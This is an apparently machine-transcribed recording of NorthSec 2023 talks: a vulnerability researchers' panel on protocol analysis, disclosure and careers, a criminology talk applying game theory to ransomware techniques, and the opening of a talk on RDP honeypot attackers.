be able to chop it up. There's usually a version number of some sort and usually a version number doesn't change or if it does change, it's going to be interesting because you can use old versions. Usually there's stuff like that. Then usually there's a list of values. The most typical thing I see is type length value where there's a type, like, string, a length, like, 10 bytes and a value, like, 10 characters. So I'm looking for stuff like that and almost every protocol ultimately comes down to that. Sometimes it's more complex and then it's less complex but that's usually what I'm looking for and if I don't have Wireshark available, if it's, I guess I should mention one other thing. There's been several projects I've worked on where I'm looking at a client app. Like, I install this service on Windows and I double click an .exe file and it gives me a UI for it. If you're packing after that and listen to local host, sometimes those still communicate over TCP. The current thing I'm working on that is not public yet. I did that. I ran it. I packing after the local client and then I use that same protocol remotely and what's funny is sometimes the local client, this goes back a couple of projects ago, but sometimes the local client will say, like, I am a local client. Here's a field that says, like, I am authenticated and the remote users don't set that field but if you set that field, it actually works. There was a tool called Flex License Manager or something that was used by Citrix and that was exactly a vulnerability report on that, which I'm not sure actually I've ever got fixed but it's on the Robinson and Blog where the local client would say is local true and the foreign client would say is local false but you can just say is local true and bypass the off checks. So like I think it works sometimes. Yeah, I sometimes have a bit of a chicken and a egg problem because like also in this research, it's a lot about analyzing how Windows joins itself but that's all happening, like when you install the operating system. So obviously at the Windows installation screen, there's no tools yet, there's nothing and most of it is web traffic. So it's quite, well, if you can get it to a proxy, it's quite easy to analyze. That's how you tell Windows, like at the very first moment you put it up after installation to use the proxy and to think, put everything through that and then also there's like, when you have Azure AD joins managed systems, there's an MDM involved which uses client certificates so then you need to intercept the registration and then intercept the client certificate and then do that and then you can do crypto traffic because otherwise things will break. So eventually I figured out that instead of having everything, trying to do everything manually and import these certificates during the installation, I could just use the device management solution to push my certificate and to push myself as a proxy and then it will happen automatically. So then you won't catch the very beginning but at least from the once the Windows contacts the MDM, it will put the right settings and after that everything goes through automatically. So, use the tools that you have as well. So you're both professional security, vulnerability researchers. We have some questions about your workflows. I'm guessing some people want to learn or understand how do you manage your time? Are you a very free form person or do you time box a lot? Do you assign specific time lengths or periods for specific parts of your research? Can you elaborate a little on how you organize your time? Yeah, for me, I would say I'm on a disorganized side. I usually have some idea of the project I'm working on, usually, and the outcomes I'm looking for. The first thing I usually do is look for a tax service and sort of mentally break down all the things I want to look at. Are there network services? Are there TCP, UDP services? Are there like Windows services? Are there startup files? Are there like configuration files? Is there encryption? Is there web? Is there whatever? And try to get an idea for all the things I want to look at and just experience intuition, telling me how long it's going to take. Probably this will take a couple of weeks plus plan a month kind of thing. And then once I start working on it, as long as I'm making steady progress, I'm not just hung up on something, I feel like I can go for a long time and eventually I get, again, it's kind of intuitive of knowing when I've explored the major tax service I want to look at or when I feel like I'm not going to find anything. And after a while, it's hard. Like the current project I'm working on has like eight different protocols to influence and I worked on one for about two months and got some nice findings and sent them to the vendor. Now I'm like, do I really want to work on the other seven or do I call this good? Cause I feel like I have a lot of context on the project now. I know how to install it. I know how the code kind of is laid out to C++ and the classes it uses and stuff. Like I want to continue on it but I also feel like I could do better work elsewhere. So I think once I get back from Montreal I'm going to have to answer that question cause I'm pretty free for them in that sense. Yeah, so I'm not a very organized person. That also goes into my research. Sometimes I just look at something for a day or two and then abandon it in order to get back to it later. Usually when I do research a certain topic then once I have the feeling that I found what I could find and I have a rough understanding of the things that are at play there then that's enough. That's usually also the point that I send the reports over to Microsoft. And it always takes a while to fix these things. So usually like that's just a waiting period then have to wait for them to fix it and see how they fixed it. And then I can release my tools and then I figure out, there's a few more things here that I assumed and don't know fully yet. And then when I make my slides, when I make a blog then look at it again and then find some more things sometimes or find some alternative ways or research some more parts. Like for this talk also I had a feeling what was possible but like the anti-hash extraction I actually got at working yesterday. So I knew it was possible. I had seen it in the past but I didn't remember the exact implementation and then I got it working, got a screenshot, put it in the slides and then it was done but it's good to be made a little bit better. So also need to brush up those tools a little bit before I push them to get up. So it's not always very organized. It doesn't help that there's not, well, obviously you want to report these things and make sure they get fixed. So you cannot just write it, push it and then blog it in one week. But yeah, I do have a lot of like concept things that I have locally that I work, that I have working. Some things that work, they can do things but they're so vague that I don't even understand why they work so that needs some more research as well. But yeah, it's always challenging to focus, to find the focus, to deeply focus on a project and then to finish it, to wrap it up, to write it all down, to make screenshots, make it understandable for people that haven't dedicated that much time in it. But well, it works. I've also got a problem that I call like one lasting problem where I feel like the last thing I do is always half my time, where like I did a project a few months ago and F5, big IP, and I found some vulnerabilities. I reported to the vendor, they confirmed everything and I went to write the blog and I was like, you know, I never did run BurpSuite as one endpoint and I crashed the server and was like, oh crap, now I gotta do a second set of this. And the current project was the same thing, like I got to the end and like I got some okay findings, the thing exciting. What if I just do a quick crappy fuzzer and just flip bits in the packet and I crashed it? Oh no. And like the last thing is often the biggest thing and I did that when I was a pen tester too. I'd be writing the report and be like, hey wait, what about? And then it just becomes an avalanche. Are you some very individual researchers or do you exchange a lot when you find something that you aren't sure, you have some stuff on the table that you, they would need more research? Do you rely on friends and contacts at that point or do you push by yourself? You usually, I'm doing things in contacts of work and I have one coworker who's in Ireland, I'm on the west coast of the US. So like we're nine hours apart so we don't really work together all that much. And I like to work with other people at my company but realistically my team is very, very small. So I don't get to do it much. There are like before we have findings and before we have O-days, I occasionally tag friends. I was working on a weird compression issue a couple of weeks ago. I have a friend who's a big like crypto and compression nerd. So I reached out to him and said like, hey I have a weird problem. Can you help me make a file that compresses to itself or do you compresses to itself? And he said sure and we built it and that ended up being like a finding. So like I'll reach out to friends sometimes but realistically I can't do it much just because of I'm doing everything for work. Yeah, so I don't collaborate with other researchers that often. Of course we all learn from each other's works get inspired by each other's research. So there'll be a lot of people that do the research I'll read about it, build forward on it. I do have some projects that I do together like working on a project with Olaf right now as well on some Azure AD research. It's comes with new challenges like if I have just my labs on my own machine it's very easy if you need to share a lab environment with virtual machines then get into all new kind of issues like where are you gonna host it? How are you gonna make sure that we both access it? Gonna keep notes, could share each other. How do I get the better version of my tool that contains all this non documented stuff and get it over to that. But yeah, of course it's great to collaborate and get some different perspective. Usually I do things on my own though. We have some questions from the public that are asking about disclosure, vendors and funny stories. Any worthwhile anecdotes there? Disclosure is sort of an interesting issue because every researcher and every company has their own policies. Our typical one at Rapid Seven, a guy named Todd Beardsley worked for us until fairly recently, now he works for government, something, SZA or something. But he helped draft a disclosure policy with my manager and with me that said like when we send a vendor reports we say here's our typical policy with a bunch of asterisks we'll publish in 60 days unless we agree on something mutually better. And usually we'll push it out to 90 days or a little bit more if the vendor requests it and they're being like communicative. But we've had interesting issues in the past. There was one vendor who we reported vulnerability to and it turns out they were a customer which doesn't affect us at all but we got to be nice to customers. And they asked if they could like chat with us, the researchers and we don't typically do that but we're like sure whatever. And they were really interested in like how we got the software and I'm like so I find these cool vulnerabilities and like I have a lot of interesting advice for how to make a software more secure and he's like so how'd you download it? And it felt like kind of a waste of time. And they ended up actually fixing things without an extension so ended up being okay. I feel like I have other stories I can't remember right now but maybe I'll think of them. Yeah so I almost exclusively disclosing to Microsoft. I would describe that usually as a bit of a roller coaster. A lot of every time there's a new way that I think I think I've had it all by now but then there's always some new things. I've actually had a case that I assumed was fixed then I talked about it at a Microsoft conference no less and it turns out it was not fixed. So I accidentally dropped a zero day on a Microsoft stage. One for the bucket list. I've also had one that I talked about it last year. I assume it was fixed. I didn't look at it. I had a talk again a couple of months later then found a really trivial bypass and apparently no one else bothered to actually test my things that I say that it's actually true and whether it's actually fixed or not. So maybe there's some interesting stuff in there. But then they very quickly fixed that like within a day the specific bypass so I could have my talk in the next day. That was a good collaborative experience. Other than that, yeah. I've had one non-Microsoft case where the only way to report the vulnerability was that they basically required you to do it via hacker one. Their terms were basically like you don't get anything but you're not allowed to disclose it. So I was like, so give me some alternative way if you want my book, which they eventually did. But yeah, it's a bit of a wild west out there somewhere but at least Microsoft has a good reporting process and I get to talk to them nowadays and get some collaboration on how they fix it, when they fix it and that usually works out all right. So we have five minutes left. So I'm gonna switch subjects and move on to how do you break into a career in vulnerability research? So what's your first step if you wanna do that? So I have an old friend, Jeff McJunkin who talks about this a lot. He's a science instructor among other things. And I always like saying he said is that security, especially research is like a prestige class. If everybody D&D, you'll know prestige classes are what you can get to after you max out your normal class. And I think it's really true, is that like if you are really good at something, whether it's networking, whether it's windows, whether it's protocols, development, whatever. Once you get good enough, security stuff is a lot more, a lot easier to get into because security is often looking at how things work and how they connect and where that breaks down, where the assumptions may developing it break down. And it's a lot easier to understand the assumptions if you're a programmer and you're trying to find assumptions in someone made in their code or if you're DevOps and you're looking for assumptions people made in like their deploying pipelines or whatever. You're a lot more qualified to understand it once you've gotten really good at the thing that's kind of based on. So as a result, like I think the reason I got where I am is because I was a programmer. I did a computer science degree and was a developer for a while and I found security really interesting and I would develop a lot of tools and release things, open source. And it seems like there's a lack of that in Infosec sometimes that people use tools but don't necessarily write tools. And I found like writing tools and then exploiting research in a, I don't want to say a basic way but in a way that's easily approachable is really useful. Like reading white papers is tough for me and for a lot of us, but if someone writes, takes a white paper and writes a blog in a more casual way with examples, sometimes that can be like a really great way to learn and people really appreciate that. So I feel like writing tools and explaining the tools is kind of how I got where I am. Yeah, I think it mostly takes just a lot of investment, mostly time-wise. And then maybe natural curiosity is what helped me. I just want to know how things work. But if you want to get started in security research, I mean, the easiest way I think is just to try to understand the things that you're doing like Ron already mentioned, don't just blindly run the tools, try to read the source code, try to understand it, try to find some topics that don't have a lot of tools maybe or that don't have a lot of resources like blogs that explain how the process works. And I mean, if you want to start low-key, then just write a blog explaining how a certain process works, make sure you understand it for yourself. You don't need to find all the kind of zero days the first time in order to write a blog that's useful for others. Like if you start on your journey and you find some things that you run into, it's quite likely others will run into that as well. So if you want to start low-key, just start understanding it, start sharing that. And then once you understand the topic enough, you'll find parts that no one else went yet that you can research. And then I think the vulnerabilities will come by themselves, but at that point you've probably invested a lot of time in it already. So it's just also really challenging sometimes because a lot of people, especially in consultancy, it's just you do your assessments, you have to write the report, and then the next week is the next time. So it's mostly if you want to really learn how the things work beyond that, either your employer has to give you space or you have to do it in your free time. If you want to do other things in your free time, I completely understand that as well, but like then I don't think you will get into the research level if you don't have any time to invest into it. It's just an investment and not everyone has that. Not everyone prioritizes that, that's fine as well, but yeah, it's different ways of doing things, I think, and getting there. I think we're pretty much done. So thank you very much for spending some time with us. I hope everybody liked that. Thank you. Have a great lunch. You're welcome. So I think our two guests mentioned that they will be around for the rest of the conference and we should also maybe cross them at the CTF. So if you have some other extra questions, you can chase them. Test, test. You're using the monitor in there? Oh yeah, that's all. You're on it? Good. You tell us on the stage. Hey, hey, one, two, check, check. Welcome everyone. Good afternoon. We're not north-seq 2023. We will have a great afternoon. OK, faculty, I'm from Pugensky. All right. So welcome back to day two. We are continuing with the criminology block, so mostly from University of Montreal to be precise. Also from the University of Montreal, our moderator, Massara Paquet-Clousson, is a professor at the University of Montreal and a collaborator at the Stratosphere Laboratory. She holds a PhD in criminology from Simon Fraser University and is specialized in the city of profit-driven crime enabled by technologies. In the past, she worked five years as a researcher in the private industry and is now a north-seq veteran and international speaker. So please welcome Massara. Thank you so much, and thank you for being here just right after lunch. It's really nice. We have three great presentations coming up. So we'll first start with Vicky Desjardins. She's an English major, sorry, an English lit major turned criminologist, turned cyber threat intelligence analyst. She's eternally optimistic that research can make the world a better place. She turns crazy ideas into research projects and figures out later if they're actually possible. So welcome Vicky, and thank you for your presentation. Thank you. So hi, thank you all for coming after lunch on the second day. I'm very happy to have you today. So thank you for coming for my presentation. Checkmate using game theory to study the evolution of ransomware. This is gonna be a presentation about my preliminary results from my doctoral research. Perfect, so who am I? Well, I mean, Massara described me pretty well. I'm a PhD candidate full-time, but I also work at Itachi Systems Security full-time as a CTI analyst. I enjoyed reading a lot, boxing way too much, and growing potatoes on my balcony. And above all, I'm also a crazy cat mom, so this is my little one. His name is Mr. Darcy, and he's pure evil. Don't get fooled by this face. So let's go over really quickly the presentation plan. So I'm gonna introduce game theory really in simple terms, because otherwise I could spend three hours just on this. I'm gonna discuss the reality of the cyber battles against ransomware, because this was something that I didn't anticipate until I started in the industry, and that really impacted my research. Then I'll present the research methodology in the sample. Because this is only a 30 minute talk, I'm only gonna present certain results and analysis. I'll discuss the limits because there is no research that is perfect, and then I'll conclude with some of the future steps that this research will take. So what is game theory? Game theory analyzes the interaction between self-interested groups who behave strategically to maximize the probabilities of getting their end game. If we wanted to use this definition in terms of cybersecurity, what we could say is that we study the interaction between attackers and defenders in a way to predict the outcome of that interaction. However, for this research, I'm not using game theory to predict behavior. I was warned by my director and my supervisor that if I did, I'd fail automatically. My thesis, and if you've done a thesis, you don't wanna fail for something so stupid. So let's get back on topic here. So game theory is an economics theory, which is often used in warfare or in conflict management, right? You've probably heard of it on TV shows, but it gets usually very simplified and dumbed down. The only one show that I saw that did it pretty good was Prison Break Season Five, and even that was pretty simplified. I did pick this theory when I thought it was cool, and now I'm regretting it every step of the way, but we're three years in and we're going with it, right? So what game theory brings is that you can look at how people behave, how they play together, and how they're gonna pick their strategies, based on this interaction. So one way of doing this is you can look at what the person wants, what's their end game that they wanna take away from this, right? The reason they're in this game. So if we wanna simplify this in cybersecurity, we can say that attackers wanna make their attacks successful, whereas defenders wanna block all these attack. So their behaviors are gonna be, the choice of strategies is gonna be according to their end game. So the only problem is that they can't both be winners and both can't be losers, right? So this is why we're in a situation of zero sum game which is defined as the win of one causes the direct loss of the other. So in cybersecurity for an attacker to win the defender must have lost. You can have half wins, right? You didn't just half-ass it. Whoops, I don't know if I'm allowed to ask, but whatever. You didn't halfway do it. You were successful. So I've talked a lot about definitions and you're probably thinking like, I really don't care about econ 101. I skipped it for pints. So let's just bring it back to the main subject. So in ransomware, the end game of the attack will be to launch that successful attack and I'm gonna stick on the technical side. I'm not gonna focus on the extortion side today because 30 minutes, but so let's just say that for successful ransomware to be done, the technically speaking, the threat actors need to be able to encrypt, corrupt or steal the data. If not, the attack is not successful. So this is why we're in a zero sum game. The cause of one, the win of one causes the direct loss of the other. So there are two types of game that I'm gonna talk about today. There's the static and dynamic games. So static game is when the players are both acting at the same time and so you have limited ways that you can prioritize strategies, right? You can think of rock, paper, scissors. Technically there's only three strategies, but unless you've played with the person multiple times, you're limited in what the person is gonna choose as a strategy. And again, there's only three. I feel like most people start with rock first, like that's just the easy one. So if you're thinking about this and you're like, okay, I should prioritize paper because then I'll win, but then everyone's thinking the same way. So then scissors technically becomes the main strategy that would lead you to win. But if you haven't played this person before, you're still kind of guessing and you're, well, you have one third of a chance to be right. Dynamic games are different because it's more of a sequence. So it's one after the other. You can think of a game of chess as being dynamic, right? So in a dynamic setting, you have more time to plan and more time to prioritize certain strategy over the other and you see what the other are playing. Now you take for granted that you both know the end game of the other because we're playing chess. We're gonna stick to the chess example for now. But there are two ways you can go about this. If you wanna win or make them lose, which in game theory, those are two different things, right? Depending on the type of settings you're in. So if player one does not want player two to win, player one can decide to take strategies that would block the other player or take strategies that will make them win. So in a sequence, in a dynamic setting, you have a lot more opportunities to learn from your partner and dictate how you wanna either maybe push them into a corner or make yourself get ahead of the game. See, when I first started this research, I thought cybersecurity was a clean cut dynamic setting and well, I was wrong. So let's figure out why I was wrong. So the reality of cyber battle, I started this research over three years ago now and when I did, I wasn't working in the industry. I wasn't at Itachi yet and I got hit with a brick when I started working in the industry because the reality was so not the pink bubble that academia can be in research, right? I got thrown into a war zone of just like, there are attacks everywhere, there's one defense team, this is not the rules engagements, they're just not there. So this became very complicated when you're trying to study this from a game perspective. So one of the main conclusion that I saw was, it's not one game at once and it's also not one team against the other. It's more a bunch of different attackers team versus one team of defenders. So if we're gonna take a sports metaphor, it's kind of like if the abs are playing against Toronto, Ottawa, Vegas and Washington all at once on the same ice. Now, none of these teams represent the same level of threats but you still kind of have to deal with them all and yes, if you know the dig, you know the dig. That's all I'll say. So here's the problem with game theory with this in research. Is that it's very difficult to reconcile the fact that you're supposed to be one player against one player and one player can be a team of players by the way, just in case I didn't mention it. And then the other problem is that the weight of winning is no longer the same because the teams aren't the same. So for threat actor, for threat actor groups to win they need to hit one place at the right time with the right tool or the right exploit or whatever to win. It's a little bit more complicated than that but we'll simplify it for now. The problem is on the defender's side they must protect everything everywhere at all times and that's just not the same weight because for those who work on the blue teams or defender's side, you know that you always get surprised of things that you didn't know were connected on your attack surface like that random printer that's still admin admin from 10 years ago. That they didn't put it on the sheet and you didn't know existed until it was too late. I see some of you laughing because you know it happens, right? So now the thing is we're in a situation where defenders are just set to lose at all times and now I didn't really like that and I decided to try to do something about it which was kind of my downfall but we'll talk about that. So story time, quick story. So in my family we play this game called pay me, okay? We play every event for hours on end and it's a dynamic setting card game. You either need to do series or identicals, right? But because I've played with the same family members over and over again, I kind of know what they do and their choices of strategies. So for example, my grandma who's like the sweetest person ever, she counts cards like I just know it, she does it. My brother loves risks so he goes big at all times. So just he's going all in. He's never won a game in like 10 years but he still aims for that strategy. I do not like risk, I'm not someone who likes risk so I play it easy and just cheat. But maybe I do, maybe I don't, I probably do. So my point is because I played with them for years, I know how they behave and I know their strategies, right? So how about applying this logic to cybersecurity and learning the attacker's playbook? If you wanna block attackers, you need to know how they might behave, right? But then in cybersecurity research that applies game theory, one of the main downfall is they're like there's too many strategies, the number of strategies is infinite and we can't do it. Well, yeah, okay, technically speaking, theoretically speaking, sure, yeah. But no, because we're all humans, right? You might, there might be an endlessly amount of possibilities but humans don't know all of them. So you're already kind of hinting at something, right? Humans are rational, well, some of them are rational, not all of them. So I wanted to start looking at that playbook but then look at it from an evolutionary perspective. But instead of focusing on everything that's changed, I wanted to look at what didn't. And the reason I wanted to do this was a few, before I started this research, I was reading this article that said that there are 20,000 new ransomware per quarter, right? And I'm pretty sure it was actually monthly but let's just be conservative and say it was quarterly. And I remember thinking back then when I didn't really know anything about ransomware, well, compared to today I knew nothing about it, but I was like, there is no way in hell that there are 20,000 new strains that are created from scratch, right? Just didn't really make sense. And when I started doing the data collection, I realized I was onto something but back then I didn't know. So what I wanted to do was look at what hasn't changed and focus on this because the idea was if it hasn't changed in, well, and got like the number of years that I was gonna study, then why would it change now? Why would it change next? And this is not, again, not in a prediction. It's more in a common sense situation, right? And then I wanted to know, well, if we can figure out what hasn't changed, can we prioritize countermeasures to these weak spots? Because then it might give us a chance to equal the weights of winning and losing. This was the idea. So this is the presentation of my doctoral studies. So the question was, how can game theory be applied to study the evolution of ransomware? And again, like I said, the research aim was to identify what hasn't changed in the techniques. The end game of this project will end up while aiming to create an interactive kill chain using, well, not a kill chain. I'm not allowed to say that. So an interactive kill tree using commonly used defense evasion techniques, which I'm not gonna have time to talk about today. But today what I'm gonna focus on mostly is on discovery and defense evasion, because it's what honestly interests me the most. So the methodology. So I gathered over 400 white papers. And the reason I use white papers to create this database was because I'm a criminologist and not, so my malware analysis technique skills are non-existent. So I had to rely on the white papers. So what I did was I took those white papers and I applied the Mitra framework to them and tried to see if I could study evolution this way. Now between you and I, this was the wrong call and I probably shouldn't have used the Mitra framework, but it was a well-established model that I knew was gonna be accepted for my thesis. But I'll explain to later on in the limits why that was probably not the right call. So what I did with those white papers is I collected not only the Mitra IDs, I collected also type of encryption they were using. They're AKAs, all known as, they're known associates and particulars that they had. I'm not gonna have time to talk about all of this today, but I honestly, I kind of vacuumed it up and grabbed as much as I could and then played around with the data. So I ended up with a sample of 116 strings. 51 were cryptoware, 65 were leakware. And then I also redivided for future testing the difference between ransomware as a service versus owned. The sample is from 2016 to 2020, well, I'm gonna say 2022 because I only have one for 2023. I do after Nordsec wanna go back and actually add a little bit more, but I also need to graduate, so we'll see how that goes. But the original idea was actually a 15 year sample and I don't think I would have ever survived 15 years that I didn't have enough white papers. And then I realized here that there's, I took some of you guys's white papers, so thank you so much for everyone who wrote one. I really appreciated it. So the fun part, the reason we're all here, right? So let's talk about some results that I did. So I wanna talk briefly about initial access, right? Because it's the entry point and this is something that's not gonna come as a surprise but phishing remained the most used tactic for technique for initial access and that was very stable per the six years that I was studying. So this is good news and a bad news because the good news is, is because it requires an interaction from a game theory perspective, it teases the idea that it can be stopped. And now, before we collectively roll our eyes because I said phishing can be stopped and we all know, most of us know that this is not that simple. I know, I really know. The idea is that game theory teases this. I don't know how realistic it is considering how stable this been but we can still continue to work on this. When phishing was not an option or wasn't used, vulnerability exploitation was the second one that was used the most. It's harder to do sometimes but they're not dependent on users' behavior so that made it a little bit simpler sometimes. I don't wanna dwell on this too much because I only have half an hour and honestly I kinda wanna geek out about other things than phishing. Not that there's anything wrong with it, it's just, it's phishing. I like funny things better. So then I started focusing more on internal discovery. So when I first started gathering the data, I wasn't really doing any sort of analysis, right? I was just kinda gathering up and looking at it and what did draw my attention to was discovery. So it probably shouldn't have surprised me as a CTI analyst but back then, I didn't know as much as I do now but there was a lot of accents put on discovery, internal discovery and it made sense later on because even though we all kinda know what's inside our infrastructure, we don't know where things are exactly. It's kinda like if you go rob a house, you kinda know that there's gonna be certain money or pharmaceuticals in bathroom but you don't know which bathroom and you don't know where the safe is. You have good idea that it's probably gonna be in the office but do you really know where the office is from the outside? So this was kind of the same logic, right? And as a CTI analyst, I got asked a lot of times like by clients that were just like, do you know what they took, right? I got ransom, they encrypted everything, do you know what they took? My answer was always the same. Whatever you're afraid that they took, that's what they took. The whole point of ransomware, you have to make it hurt, right? If they didn't take what hurts the most or what you're most sometimes ashamed of, then it wouldn't really work. My point in all of this is that you need to know what's in your infrastructure. You need to know where things are and what's valuable to you because they will know it for you. We've seen an increase of ransomware groups that are tailoring their ransom demand to their insurance policies because that increase their odds of payment. So they are looking, right? But what it also tells me was that from a game theory perspective is if internal discovery is really important to them, it can also be leveraged for defenders, right? So if you prioritize what you need to be protected at all costs, right? And I know we always say you need to protect everything, but let's be realistic, no one does. But you need to know what the goal is, like the pure jewels, you need to know what it is and how to protect it and put extra layer around those. And as a by the way, your employees' data falls under that category, please, for all of the employees. So this is what you're gonna wanna do. The idea is if they're taking their sweet time with internal discovery, it gives you a chance to put it, like a trip wire or some sort to be able to protect yourself or at least throw one hell Mary to protect yourself. But I'm getting ahead of myself and I'll talk about this a little later. So this is from the sample, the discovery techniques that were most used in the sample that I had. And as you can see that it's a lot of looking around where things are, how to move around the infrastructure and looking for documents. So basically one of the main things that I saw was that there were also looking for certain files, extension files, right? They're looking for the Excel files in some Word document. And then the ones that includes things like Revenue 2022 that you know is gonna be on the OneDrive somewhere and it's gonna be shared across multiple people, you want that, right? They're gonna be looking for it. They're gonna be also looking at ways to travel within your infrastructure. So Defensivations, okay. So Defensivation was a big thing because I always thought it was the battleground of game theory, right? This is where the main interaction is where you're testing your defense against your attack. And then turns out this is kind of where things went downhill for me. This is a distribution of Defensivation techniques in my sample. This sucked because I had too many strategies that weren't recurring. So when you're looking at something that isn't changing, strategies that are once out of 116 is not good because then you can't really draw any conclusion from this. So when this came out the first time, honestly I was like, I think I'm gonna have to change this project and the pentesters in my life were right and I can't do this. But then I didn't, I kept going and then turns out I was still right. But my point is with something like this, you're kind of like, okay, so there's a lot of possibility of Defensivation, but then why is there not more? So then I decided to do a cluster analysis. So cluster analysis is grouping sets of object in a way that they group the same people together that are more similar and different in different groups, I guess. One of the main problems I had is I had too many variables. So the first few times that I tried running this test, the software crashed twice. And then I realized the mistake was I had too many, so I had to cut down. And this is where things get tricky in research is that you can just randomly select what data you want because then that's just not fair and you're playing with data, right? It's garbage in garbage out. So what I had to do is think about it in a way. I'm like, okay, so if my goal is finding out what hasn't changed, then I need to pick the top 15 strategies that were most used. And as you can see, even when I did this, the model is still lower fare. It's still not great cause I had too many variables. Now I could continue to play with it, but then that just wouldn't be ethical. And as much as I enjoy blurring the lines of hacking, this is not one of those times. So I got two clusters, I got two groups. My sample was divided in two. I have, I got no time to evade at 56% and 44% was catch me if you can. I work full time and I do a PhD full time. So I find the fun where I can, which is naming stuff and names that I probably shouldn't. So let's look at them. Let's look at how they're, you know, the main particularies of each group. And what I found was it was pretty surprising because I had really thought that I was gonna be facing groups with a lot more strategy, especially for the I got no time to evade. And this is a group at 56%, right? So it's most of my sample. Well, above average, well, above half. And I kept thinking, why? Right? Why would I have a group with so the majority hasn't done much? And then it got me to thinking there are multiple possibilities for it. One of them is that my framework is not working, that the techniques that they're using are so new or sophisticated that the Mitra didn't include them, which is a possibility. The second option was maybe they do such a good job at internal discovery that they know in advance what to avoid and don't need to use defense evasion techniques or they'll focus on basically what they really can. But because they took their time and mapping out and sniffing things, they didn't have to evade. The third option, and this is maybe more of the CT analyst speaking, but the third option was, well, in order to evade defenses, you need defenses in the first place. So maybe the victims didn't have any countermeasures in place and therefore they didn't need to avoid evading much defenses. The second group, which is the smaller one, the catch me if you can, had their hands in multiple types of strategies a little bit everywhere, right? So for them, I kind of got the idea that they were a little bit more teasing, just doing a little bit of everything at once. Whereas I got no time to evade, really focus on hiding their code and their presence in their code. So I got more of a weasel kind of type for them because the devil is in the details and if the defense is not looking in the logs for any small little abnormalities, they would probably miss it. So this is what I got from this. The common strategies, so this was what both group had in common and it was a lot. Like they both had these strategies multiple times at a higher rate, I guess. And so that's why I wanted to talk about them. So what I saw from this is that the core real defense evasion laid a lot on avoiding sandbox, so sandbox evasion and modifying, well, disable or modifying the firewall. So these were more defensive evasions that were more direct to evading defenses. Whereas the others, even though they're considered defensive evasion, were a little bit more on like trying to set yourself up for your next step, right? So they're looking at ways to move around for lateral movement, persistence, and elevation of privileges, which I thought was interesting because when I thought of defensive evasion, I really thought it was attacking the differences, but then turns out it was also just by kind of weaseling out of them too. So time flies when we're having fun, so I'm gonna keep the short. So this is where I kind of am. I forgot to mention two weeks ago, my partner dropped his coffee all over my laptop and I lost four months of research. And so I had to restart everything in the last two weeks. So this is the result of this. So this is why some of the results are not as push as I had intended it to be because I didn't have time to finish. So the attackers play book. So I know I've been quick on the results, but honestly, I can really geek out about this for hours. So I'll be around today and tomorrow. So if you have more thoughts or questions or anything, I'll be very happy to geek out about this more. So let's go with the short conclusion on this. So in an ideal world, we'd focus on threat actors just not getting initial access, right? In an ideal world, we would all have such strong walls that nothing could get in. But honestly, that's just not the reality. And like, sure, we could increase the security around emails, teams, Slack, LinkedIn and all of this. It would help, but I don't think it would stop anything. So I rather focus on limiting damages and making the job of hacking harder than it has to be because then a lot of threat actors are just gonna be like, eh, whatever. I'm not wasting my time on this, right? So that brings me back to discovery and defense evasion. So what I learned is that the importance of discovery, even though it's logical, defense could use this to their advantage because threat actors may know what they wanna find, but they don't know exactly where it is, right? And this is where you can mess with them. So you can make that job a lot harder, longer and with more traps. So in criminology, we suspect that the longer the crime takes to be committed, the more chances of natural, well, not natural selection, but of natural ways to be stopped, right? You have more chances of getting caught, more chance of something going wrong. So why not apply this to the discovery stage, right? Fool them, make traps and traps that can give you enough time to protect the jewels. So I was talking to one of my favorite pentester of all time, Adrian, who's right here today, and I was asking him about honeypots because I know honeypots are, you can see them from miles away. So I wanted to, what's the alternative, right? Modern day alternative. And he was talking to me about putting vulnerable switch devices in pre-selected spot in order to use them to raise an alarm that would give you enough time to protect the jewels. I watch and listen to an episode of Dark Knight Diaries two days after that conversation and that product was already out there, so I guess I was onto something. So the limits of this paper. I'm limited by what was in the white papers. So if I didn't have enough information, I kind of disregarded the strain because I couldn't do much with it. I was limited on that side. Ransom were customizable and they do change depending on their target. So I need to be clear that it's 116 strains that were seen at least once, but it doesn't mean that I got the full, I don't know, like log bit three's full MO, right? Because they changed with their targets. So the result cannot be fully generalized, but it is telling us at least some trends that should not be ignored either. The Mitra framework is great, but when you're trying to analyze it for evolution, the newer papers included a lot of strategies that were not in the Mitra framework that I had to add in myself, which then became kind of a problem. So the next step is to continue to analyze the strategies against the years, but this time I'm going to do it from a qualitative perspective because based on stats, there wasn't that much difference and it was hard to handle. So again, devils in the details, right? Then I'm going to be mapping out the strategies in a kill tree and then, but only focus on defense evasion and I might actually include discovery yet, but I haven't talked to my supervisor about it. And then the final step is, yeah, I got to write the paper. I got to write the dissertation and defend it. So hopefully by next May, I will have something done, but life, you know. So on this, I want to thank you all for coming to my talk and this is, well, if you want to reach me, if you want to talk to me, I'll be around, I'm volunteering tonight and tomorrow and this is my best friend, Kevin, for those who don't like cats. So I put a dog at the end to make sure that you would have someone. He's living his best life in Scotland and he is thriving. So I thought you would enjoy a dog at the end of this kind of grim presentation, even though there was a lot of pink. So thank you so much for your time. All right, thank you so much, Vicky. If you have any questions to Vicky, we'll be asking them afterwards. You can try to scan this beautiful QR code and then write your questions. We'll review them to make sure that they're acceptable. I have no doubt. And then after that, we'll ask them during the, do you want to set up, yeah? The moment. Blah, blah, blah, blah. Alarie, in fact, I have slides. Yes, but I thought we'd come back right away, the next time, you know. No, no, we'll be there in a minute. Oh, please don't go. Okay. All right. Okay, so we'll start with our second talk of the day with Andréan. Please take a seat. Andréan has a PhD in Criminology from University of Montreal and works as a cybersecurity researcher at GoSecure, acting as the social scientist of the team. She is interested in online attackers' behavior. She's an experienced presenter with over 38 academic conference. Are we still at 38? 42. 42? With today, 45, I don't know. Good. I lost the count. With over 45 conferences and is now focusing on the infosec field. So if you want to know what to do when you have an... What you can infer from RDP honeypots, please stay and welcome Andréan. Thank you, Massala. I wish to say thank you to Hugo to schedule me in the afternoon because this morning was hard after the party yesterday. Were you there? It was a good party. I loved it. So yeah, I'm here to talk about the extent to which human is implicated behind automated attack on RDP systems. So, you know, I see human implication on a continuum. So you can launch an automatic attack, a very basic one. And you can think more about your attack and make it a bit more sophisticated. So this is the type of continuum I'm looking at or trying to build to understand the attacker strategy better. So Massala already introduced me. So I don't have to do it all over again. So I'm a cybersecurity researcher at Go Secure now. And I'm also involved in the NordSec organization. So I swapped my red t-shirt just for this presentation and then I'll put it back on. And I'm also part of the research group on open source at the University of Montreal as a scientific director. So a lot of engagement, a lot of fun. I like it. So the objective of our research program, so not just the research I'm presenting today, but also all the other research I do with my colleagues is to understand the attacker strategies to share hopefully, to share prevention advice and also to fight again attackers anonymization because it's hard to really de-anonymize an attacker with 